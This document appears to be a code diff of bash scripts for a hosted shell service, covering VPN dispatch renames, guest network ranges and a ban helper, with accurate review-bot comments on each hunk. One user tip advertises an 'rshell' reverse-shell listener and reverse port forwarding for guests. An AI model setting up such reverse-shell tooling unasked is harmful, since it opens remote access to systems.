|
@@ -571,8 +634,34 @@
|
||||||
|
|
||||||
reseed_prngs();
|
reseed_prngs();
|
||||||
|
|
||||||
|
@ -47,6 +47,23 @@ Sanitize()
|
|||||||
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
||||||
}
|
}
|
||||||
|
|
||||||
|
InitColors() {
|
||||||
|
# COLOR is set (to 'always')
|
||||||
|
Y=$CDY
|
||||||
|
C=$CDC
|
||||||
|
R=$CDR
|
||||||
|
RR=$CR
|
||||||
|
G=$CDG
|
||||||
|
B=$CB
|
||||||
|
M=$CDM
|
||||||
|
YY=$CY
|
||||||
|
W=$CW
|
||||||
|
N=$CN
|
||||||
|
F=$CF
|
||||||
|
ICON_ERROR="💥 "
|
||||||
|
ICON_WARN="💥 "
|
||||||
|
}
|
||||||
|
|
||||||
GetFormVars()
|
GetFormVars()
|
||||||
{
|
{
|
||||||
local IFS
|
local IFS
|
||||||
@ -71,7 +88,6 @@ GetFormVars()
|
|||||||
[[ ${key} == "config" ]] && {
|
[[ ${key} == "config" ]] && {
|
||||||
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
||||||
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
||||||
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
|
||||||
}
|
}
|
||||||
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
||||||
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
||||||
@ -128,6 +144,9 @@ GetFormVars()
|
|||||||
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
||||||
}
|
}
|
||||||
done
|
done
|
||||||
|
|
||||||
|
[[ -n $COLOR ]] && InitColors
|
||||||
|
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||||
}
|
}
|
||||||
|
|
||||||
# Load PID of WireGuard container
|
# Load PID of WireGuard container
|
||||||
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
|
|||||||
|
|
||||||
# The PortD add's a /sf/run/self/reverse_forward.
|
# The PortD add's a /sf/run/self/reverse_forward.
|
||||||
echo -en "\
|
echo -en "\
|
||||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
|
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
|
||||||
${M}🤭 Tip${N}: Type ${C}rshell${N}
|
${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
|
||||||
${G}👾 New reverse Port is ${Y}${ipport}${CN}"
|
${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
|
||||||
|
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
|
||||||
|
|
||||||
# portd.sh automaticaly adds this to /config/self/reverse_*
|
# portd.sh automaticaly adds this to /config/self/reverse_*
|
||||||
exit
|
exit
|
||||||
@ -807,22 +827,7 @@ cmd_wg_show()
|
|||||||
0<&- # Close STDIN
|
0<&- # Close STDIN
|
||||||
Sanitize
|
Sanitize
|
||||||
GetFormVars
|
GetFormVars
|
||||||
[[ -n $COLOR ]] && {
|
|
||||||
# COLOR is set (to 'always')
|
|
||||||
Y=$CDY
|
|
||||||
C=$CDC
|
|
||||||
R=$CDR
|
|
||||||
RR=$CR
|
|
||||||
G=$CDG
|
|
||||||
B=$CB
|
|
||||||
M=$CDM
|
|
||||||
YY=$CY
|
|
||||||
W=$CW
|
|
||||||
N=$CN
|
|
||||||
F=$CF
|
|
||||||
ICON_ERROR="💥 "
|
|
||||||
ICON_WARN="💥 "
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
||||||
@ -836,13 +841,13 @@ GetFormVars
|
|||||||
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
||||||
[[ -n $SF_OVPN_HACK ]] && {
|
[[ -n $SF_OVPN_HACK ]] && {
|
||||||
wg_net_init
|
wg_net_init
|
||||||
[[ ${ARGS[1]} == 'vpn' ]] && {
|
[[ ${ARGS[1]} == 'ovpn' ]] && {
|
||||||
source "/sf/bin/funcs_vpn.sh"
|
source "/sf/bin/funcs_ovpn.sh"
|
||||||
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up
|
[[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
|
||||||
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show
|
[[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
|
||||||
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del
|
[[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
|
||||||
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
|
[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
|
||||||
cmd_vpn_help
|
cmd_ovpn_help
|
||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -869,14 +874,14 @@ wg_net_init
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
[[ "${FCGI_CMD}" == "vpn" ]] && {
|
[[ "${FCGI_CMD}" == "ovpn" ]] && {
|
||||||
source "/sf/bin/funcs_vpn.sh"
|
source "/sf/bin/funcs_ovpn.sh"
|
||||||
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up
|
[[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
|
||||||
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show
|
[[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
|
||||||
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del
|
[[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
|
||||||
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
|
[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
|
||||||
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
||||||
cmd_vpn_help
|
cmd_ovpn_help
|
||||||
|
|
||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
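Review bot: Moving the "Path not absolute" check after the loop and guarding it with `[[ -n "$R_CONFIG" ]]` changes what a leading-dash config value gets: it is cleared by `[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG`, now passes the relocated check silently, and the request reaches `cmd_ovpn_up` with an empty R_CONFIG and receives the help text instead of an error. If that is intended, a comment on the unset line such as `# leading '-' is rejected silently; cmd_ovpn_up then prints the usage` would make it explicit, otherwise BAIL there. The comment `# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)` is stale after this commit renames the dispatch to `ovpn`; it should read `curl sf/ovpn/*`. GetFormVars and the main dispatch continue outside these hunks.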
|
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
|
|||||||
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
||||||
|
|
||||||
# Create 'empty' for ZSH's prompt to show WG EXIT
|
# Create 'empty' for ZSH's prompt to show WG EXIT
|
||||||
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||||
|
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
|
||||||
|
:>"${LID_PROMPT_FN}"
|
||||||
|
|
||||||
set -e
|
set -e
|
||||||
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
|
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
|
||||||
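Review bot: `:>"${LID_PROMPT_FN}"` runs before the `${LID:?}` guard on the docker inspect line and before `set -e`, so with an empty LID it truncates `/dev/shm/sf/self-for-guest/lg-/prompt` and any failure (for example a missing directory) is ignored; using `${LID:?}` in the LID_PROMPT_FN assignment closes that gap. The commented-out `# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"` is dead code now that the file is unconditionally truncated and should be removed rather than kept alongside the new comment. The script continues outside this hunk.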
|
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
|
|||||||
SF_MULLVAD_ROUTE=10.124.0.0/22
|
SF_MULLVAD_ROUTE=10.124.0.0/22
|
||||||
SF_NOVPN_IP=172.20.0.240
|
SF_NOVPN_IP=172.20.0.240
|
||||||
SF_NGINX_IP=172.20.1.80
|
SF_NGINX_IP=172.20.1.80
|
||||||
SF_RPC_IP=10.11.0.2
|
SF_RPC_IP=100.126.224.2
|
||||||
SF_GSNC_IP=172.22.0.21
|
SF_GSNC_IP=172.22.0.21
|
||||||
SF_SSHD_IP=172.22.0.22
|
SF_SSHD_IP=172.22.0.22
|
||||||
SF_DOH_IP=172.23.0.2
|
SF_DOH_IP=172.23.0.2
|
||||||
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
|
|||||||
SF_NET_VPN=172.20.0.0/24
|
SF_NET_VPN=172.20.0.0/24
|
||||||
SF_NET_VPN_DNS_IP=172.20.0.53
|
SF_NET_VPN_DNS_IP=172.20.0.53
|
||||||
|
|
||||||
SF_NET_LG=10.11.0.0/24
|
SF_NET_LG=100.126.224.0/22
|
||||||
SF_NET_LG_ROUTER_IP=10.11.0.1
|
SF_NET_LG_ROUTER_IP=100.126.224.1
|
||||||
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
|
SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
|
||||||
|
|
||||||
SF_NET_VPN_ROUTER_IP=172.20.0.2
|
SF_NET_VPN_ROUTER_IP=172.20.0.2
|
||||||
|
|
||||||
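Review bot: SF_NET_LG moves from 10.11.0.0/24 to 100.126.224.0/22, which lies inside the RFC 6598 shared address space (100.64.0.0/10) that ISPs use for carrier-grade NAT, so a guest or VPN exit whose upstream also uses that range would see overlapping routes; that trade-off deserves a comment next to the assignment, e.g. `# 100.64.0.0/10 is RFC 6598 (CGNAT) space; upstream networks may also use it`. SF_RPC_IP, SF_NET_LG_ROUTER_IP and the DUMMY address are updated consistently (100.126.227.254 is the last usable address of the /22), but anything outside this file that still hard-codes 10.11.0.x, such as firewall rules or the RPC proxy configuration, would need the same change, which I cannot confirm from these hunks.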
|
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
|
|||||||
CG="\e[1;32m" # green
|
CG="\e[1;32m" # green
|
||||||
CR="\e[1;31m" # red
|
CR="\e[1;31m" # red
|
||||||
CC="\e[1;36m" # cyan
|
CC="\e[1;36m" # cyan
|
||||||
# CM="\e[1;35m" # magenta
|
CM="\e[1;35m" # magenta
|
||||||
CW="\e[1;37m" # white
|
CW="\e[1;37m" # white
|
||||||
CB="\e[1;34m" # blue
|
CB="\e[1;34m" # blue
|
||||||
CF="\e[2m" # faint
|
CF="\e[2m" # faint
|
||||||
|
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
|
|||||||
_sf_basedir="/sf"
|
_sf_basedir="/sf"
|
||||||
_sf_dbdir="${_sf_basedir}/config/db"
|
_sf_dbdir="${_sf_basedir}/config/db"
|
||||||
unset _sf_isinit
|
unset _sf_isinit
|
||||||
|
_sf_region="$(hostname)"
|
||||||
|
|
||||||
_sf_deinit()
|
_sf_deinit()
|
||||||
{
|
{
|
||||||
@ -507,27 +508,29 @@ lgrm()
|
|||||||
lgban()
|
lgban()
|
||||||
{
|
{
|
||||||
local fn
|
local fn
|
||||||
|
local hn
|
||||||
local ip
|
local ip
|
||||||
local msg
|
local msg
|
||||||
local lid
|
local lglid="${1}"
|
||||||
|
|
||||||
_sf_init
|
_sf_init
|
||||||
lid="${1}"
|
|
||||||
shift 1
|
shift 1
|
||||||
|
|
||||||
fn="${_self_for_guest_dir}/${lid}/ip"
|
fn="${_self_for_guest_dir}/${lglid}/ip"
|
||||||
[[ -f "$fn" ]] && {
|
[[ -f "$fn" ]] && {
|
||||||
ip=$(<"$fn")
|
ip=$(<"$fn")
|
||||||
|
fn="${_self_for_guest_dir}/${lglid}/hostname"
|
||||||
|
[[ -f "${fn}" ]] && hn=$(<"${fn}")
|
||||||
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
||||||
[[ ! -e "$fn" ]] && {
|
[[ ! -e "$fn" ]] && {
|
||||||
[[ $# -gt 0 ]] && msg="$*\n"
|
[[ $# -gt 0 ]] && msg="$*\n"
|
||||||
echo -en "$msg" >"${fn}"
|
echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
|
||||||
}
|
}
|
||||||
echo "Banned: $ip"
|
echo "Banned: $ip"
|
||||||
}
|
}
|
||||||
|
|
||||||
lgstop "${lid}" "$@"
|
lgstop "${lglid}" "$@"
|
||||||
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||||
|
|
||||||
_sf_deinit
|
_sf_deinit
|
||||||
}
|
}
|
||||||
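Review bot: The new ban-file header is written with `echo -en`, so backslash sequences in `$hn` (read from the guest's hostname file) are interpreted, and ANSI colour escapes are now stored in the file under `${_sf_dbdir}/banned/`; whether that file is later shown to users or parsed by other tooling is not visible here, but hostname should be treated as plain data either way. A printf with `%s` for the hostname, lid and ip fields and `%b` only for the colour variables and `$msg` keeps the existing output while removing the escape interpretation of the hostname; whether the guest can influence its hostname file is not visible in this hunk, and if it can this matters more. `_sf_region="$(hostname)"` is evaluated once when the library is sourced, so it names the machine running the admin tools; a comment like `# region label = hostname of the host this library runs on` would prevent reading it as the guest's region.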
|
@ -6,7 +6,7 @@
|
|||||||
|
|
||||||
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
||||||
|
|
||||||
cmd_vpn_help() {
|
cmd_ovpn_help() {
|
||||||
echo -en "\
|
echo -en "\
|
||||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
||||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
||||||
@ -241,7 +241,7 @@ vpn_stop() {
|
|||||||
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_show() {
|
cmd_ovpn_show() {
|
||||||
load_lg
|
load_lg
|
||||||
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
||||||
echo -e "${C}"
|
echo -e "${C}"
|
||||||
@ -252,12 +252,12 @@ cmd_vpn_show() {
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_up() {
|
cmd_ovpn_up() {
|
||||||
local str
|
local str
|
||||||
load_lg
|
load_lg
|
||||||
local link_mtu
|
local link_mtu
|
||||||
|
|
||||||
[[ -z "$R_CONFIG" ]] && cmd_vpn_help
|
[[ -z "$R_CONFIG" ]] && cmd_ovpn_help
|
||||||
WG_DEV="vpnEXIT"
|
WG_DEV="vpnEXIT"
|
||||||
# echo "PID=$PID"
|
# echo "PID=$PID"
|
||||||
|
|
||||||
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_del() {
|
cmd_ovpn_del() {
|
||||||
load_lg
|
load_lg
|
||||||
|
|
||||||
vpn_stop
|
vpn_stop
|
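Review bot: The usage text in cmd_ovpn_help still tells users to run `curl sf/vpn/up ...`, and the last hunk header shows `Use ${C}curl sf/vpn/down${N} to disconnect.`, while this commit renames the FCGI dispatch so that only `ovpn` reaches these functions; unless some other route still accepts `vpn`, the documented commands now fail. Update those strings to `curl sf/ovpn/up` and `curl sf/ovpn/down` as part of the rename. The bodies of cmd_ovpn_show, cmd_ovpn_up and cmd_ovpn_del continue outside these hunks.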